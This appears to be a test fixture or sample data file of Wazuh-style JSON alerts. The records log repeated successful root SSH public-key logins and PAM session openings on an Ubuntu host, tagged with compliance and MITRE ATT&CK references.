+{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} 